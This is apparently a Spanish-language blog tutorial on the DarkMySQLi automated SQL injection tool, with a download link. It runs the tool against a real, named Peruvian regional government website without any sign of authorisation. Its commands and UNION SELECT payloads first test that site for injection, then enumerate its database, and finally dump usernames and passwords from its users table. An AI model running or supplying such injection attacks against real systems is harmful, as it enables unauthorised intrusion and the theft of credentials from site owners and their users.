DarkMySQLi es una herramienta de código abierto la cual nos permite inyectar de forma automática y extraer la información de las base de datos de una web.
Link de descarga : https://www.mediafire.com/?72fcrfb2mzy16mc
Vamos a la acción !
El primer paso que haremos primero sera encontrar la web vulnerable en este caso utilizare la siguiente :
Ejecutaremos el siguiente comando para el testeo de la web :
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3" --findcol
como vemos nos voto la información principal para saber si es vulnerable a la Inyección DarkMySQLi :
[!] darkMySQLi URL: http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de--
luego que sabemos que es vulnerable a la inyección pondremos el siguiente comando :
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --full
(solo reemplazamos el numero " 3 " por " darkc0de "
Como vemos nos a votado las columnas de las base de datos clasificándolas por cada uno de ellas en sus respectivas "tablas" de manera que podamos identificarlos fácilmente los datos almacenados.
Lo que haremos a continuación sera dumpear las columnas de los usuarios con el siguiente comando :
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --dump -D regionsanmartin_gob_pe -T usuarios -C nomb_usuario,pass,tipo_usuario
Imagen completa de usuarios
Espero les aya gustado mucho el Post, un saludo y un abrazo desde PERU"
0 comentarios:
Publicar un comentario